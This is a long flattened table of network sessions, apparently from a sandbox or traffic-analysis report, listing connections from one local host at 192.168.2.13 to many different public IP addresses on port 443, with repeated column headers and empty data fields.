                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16382192.168.2.135033618.67.80.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16383192.168.2.1359192206.135.30.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16384192.168.2.1340262126.90.71.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16385192.168.2.1337558187.63.20.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16386192.168.2.1352248194.14.99.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16387192.168.2.1338820125.14.22.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16388192.168.2.135809898.44.132.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16389192.168.2.1346376106.78.191.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16390192.168.2.135409285.52.47.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16391192.168.2.1342922132.58.140.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16392192.168.2.135730627.227.96.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16393192.168.2.1360210175.118.9.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16394192.168.2.1341388131.142.189.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16395192.168.2.134665074.152.114.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16396192.168.2.1353470211.224.70.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16397192.168.2.135886486.3.28.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16398192.168.2.134705841.33.251.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16399192.168.2.1354824160.104.111.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16400192.168.2.1355122220.5.24.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16401192.168.2.13526968.15.222.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16402192.168.2.1340778204.211.143.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16403192.168.2.1356866221.6.197.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16404192.168.2.136026031.82.188.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16405192.168.2.1351592200.219.12.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16406192.168.2.1334056135.111.25.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16407192.168.2.133766238.158.234.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16408192.168.2.134262471.72.105.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16409192.168.2.1359260207.202.37.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16410192.168.2.136029071.64.29.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16411192.168.2.135774412.113.246.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16412192.168.2.1357006166.35.229.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16413192.168.2.1333752152.75.54.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16414192.168.2.1334790154.4.79.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16415192.168.2.1348052166.233.238.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16416192.168.2.134529842.44.216.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16417192.168.2.1353994154.27.157.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16418192.168.2.1344530194.191.167.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16419192.168.2.1352998209.36.100.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16420192.168.2.1351774175.55.79.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16421192.168.2.1359292103.202.133.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16422192.168.2.1340144118.137.73.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16423192.168.2.1342296116.3.133.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16424192.168.2.135988041.53.53.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16425192.168.2.1360004170.174.248.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16426192.168.2.1334448208.238.1.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16427192.168.2.134697638.227.84.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16428192.168.2.1332924164.70.13.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16429192.168.2.1355500160.157.49.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16430192.168.2.135017272.45.87.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16431192.168.2.13442005.83.129.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16432192.168.2.1336928118.39.119.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16433192.168.2.1336028101.114.200.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16434192.168.2.1344478153.202.238.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16435192.168.2.1350786124.117.169.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16436192.168.2.1355590114.248.163.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16437192.168.2.134370094.80.200.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16438192.168.2.1339586104.57.197.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16439192.168.2.1350678137.20.185.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16440192.168.2.133618459.98.250.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16441192.168.2.1337894206.198.144.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16442192.168.2.134067450.100.74.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16443192.168.2.1336354131.65.137.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16444192.168.2.136073076.183.111.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16445192.168.2.1340270182.83.107.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16446192.168.2.133279288.208.79.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16447192.168.2.134968845.182.99.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16448192.168.2.133687680.92.174.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16449192.168.2.134777082.173.159.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16450192.168.2.1346836211.203.62.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16451192.168.2.133846253.114.71.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16452192.168.2.135020434.41.107.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16453192.168.2.1333944182.125.55.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16454192.168.2.133355885.105.113.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16455192.168.2.1353368204.186.121.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16456192.168.2.134856284.43.54.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16457192.168.2.1351948182.6.91.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16458192.168.2.1335468184.209.128.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16459192.168.2.1345638149.128.34.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16460192.168.2.1334758188.120.136.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16461192.168.2.133596464.161.4.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16462192.168.2.1336210219.67.68.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16463192.168.2.136016462.181.179.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16464192.168.2.1345104117.57.8.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16465192.168.2.1336642142.92.55.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16466192.168.2.135716471.226.176.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16467192.168.2.1353286200.122.170.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16468192.168.2.1332862119.178.244.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16469192.168.2.1350508169.201.182.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16470192.168.2.1354954101.166.118.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16471192.168.2.134101685.250.177.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16472192.168.2.134123691.68.33.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16473192.168.2.135368835.150.7.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16474192.168.2.1343660124.121.31.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16475192.168.2.1333962154.205.66.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16476192.168.2.1341840128.201.191.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16477192.168.2.1350958131.225.221.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16478192.168.2.1348050106.108.52.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16479192.168.2.1360262132.154.56.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16480192.168.2.133880674.95.28.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16481192.168.2.1357422178.77.231.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16482192.168.2.1334832167.28.222.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16483192.168.2.135251065.87.121.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16484192.168.2.134479086.106.130.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16485192.168.2.134801888.169.190.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16486192.168.2.1353618165.137.230.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16487192.168.2.135857066.46.50.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16488192.168.2.1356324171.66.172.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16489192.168.2.1355926157.208.3.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16490192.168.2.1344300203.84.194.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16491192.168.2.13404965.160.140.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16492192.168.2.135589662.143.249.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16493192.168.2.133772888.74.143.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16494192.168.2.1352170161.113.53.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16495192.168.2.135951227.8.193.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16496192.168.2.1349802133.208.56.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16497192.168.2.1342928182.30.9.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16498192.168.2.134766834.159.4.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16499192.168.2.1340830186.83.29.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16500192.168.2.134270478.147.56.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16501192.168.2.1354830211.104.59.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16502192.168.2.1353472139.252.220.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16503192.168.2.1339846185.71.110.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16504192.168.2.1338050146.154.218.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16505192.168.2.135720274.206.74.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16506192.168.2.1357956170.28.178.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16507192.168.2.135669845.87.175.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16508192.168.2.1334386210.117.104.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16509192.168.2.133814466.253.218.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16510192.168.2.136049664.119.147.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16511192.168.2.133634844.226.129.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16512192.168.2.1360846196.79.12.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16513192.168.2.134755227.142.52.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16514192.168.2.1338188182.160.101.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16515192.168.2.1351220191.163.64.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16516192.168.2.133613643.24.97.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16517192.168.2.1344954117.160.193.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16518192.168.2.1339330207.59.199.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16519192.168.2.1351404145.42.251.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16520192.168.2.1334280114.222.251.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16521192.168.2.134885024.230.10.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16522192.168.2.1351222174.193.255.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16523192.168.2.13390722.72.0.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16524192.168.2.133358083.61.253.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16525192.168.2.135471261.164.83.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16526192.168.2.133371485.76.154.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16527192.168.2.135255253.220.138.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16528192.168.2.1345996149.10.108.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16529192.168.2.134964082.182.151.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16530192.168.2.1349310168.78.11.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16531192.168.2.1342344200.2.196.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16532192.168.2.1338872204.43.255.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16533192.168.2.1348758105.41.139.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16534192.168.2.1348710168.196.69.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16535192.168.2.135638440.23.114.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16536192.168.2.135745095.210.107.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16537192.168.2.134150294.2.211.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16538192.168.2.133449276.127.156.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16539192.168.2.1334444122.74.72.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16540192.168.2.13475181.13.185.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16541192.168.2.1335374164.219.149.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16542192.168.2.133996074.131.113.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16543192.168.2.1335770139.245.8.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16544192.168.2.1347960131.152.205.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16545192.168.2.133630299.50.63.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16546192.168.2.1360246107.111.211.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16547192.168.2.1334912101.6.234.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16548192.168.2.134196064.117.86.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16549192.168.2.1339310220.51.3.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16550192.168.2.1334078211.56.97.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16551192.168.2.1338910135.136.226.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16552192.168.2.133695271.250.69.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16553192.168.2.135243413.248.86.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16554192.168.2.1352374115.68.186.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16555192.168.2.1341952106.14.118.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16556192.168.2.1342660189.159.69.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16557192.168.2.134374698.88.51.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16558192.168.2.135896447.250.197.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16559192.168.2.134875413.1.38.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16560192.168.2.1351042197.107.50.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16561192.168.2.133767635.11.236.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16562192.168.2.1332826170.166.5.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16563192.168.2.1351568172.142.77.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16564192.168.2.133324085.152.239.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16565192.168.2.135819640.156.136.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16566192.168.2.1347112155.13.224.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16567192.168.2.135077093.253.44.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16568192.168.2.1358720171.65.35.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16569192.168.2.136072071.192.254.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16570192.168.2.1337602184.169.91.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16571192.168.2.135289834.81.174.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16572192.168.2.134027067.247.245.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16573192.168.2.1341022141.241.85.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16574192.168.2.134061231.232.85.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16575192.168.2.135593486.142.17.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16576192.168.2.133899831.149.172.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16577192.168.2.1340252145.245.71.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16578192.168.2.135874093.42.250.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16579192.168.2.1356220209.246.118.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16580192.168.2.1353214126.62.23.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16581192.168.2.1341104121.110.222.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16582192.168.2.1341942178.53.92.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16583192.168.2.1337966160.176.125.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16584192.168.2.1337086165.40.216.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16585192.168.2.1358038193.61.17.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16586192.168.2.135747046.21.195.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16587192.168.2.1358506135.230.240.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16588192.168.2.1337980102.167.191.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16589192.168.2.1336282147.211.230.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16590192.168.2.1359984133.121.90.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16591192.168.2.135051832.227.168.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16592192.168.2.13501901.219.86.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16593192.168.2.134901892.135.5.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16594192.168.2.1359698160.149.171.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16595192.168.2.1356942150.80.149.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16596192.168.2.1343110119.199.34.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16597192.168.2.1360106203.30.123.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16598192.168.2.1348904149.64.185.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16599192.168.2.1339490155.220.216.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16600192.168.2.1355710203.14.226.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16601192.168.2.1352416192.5.52.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16602192.168.2.1342918180.154.233.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
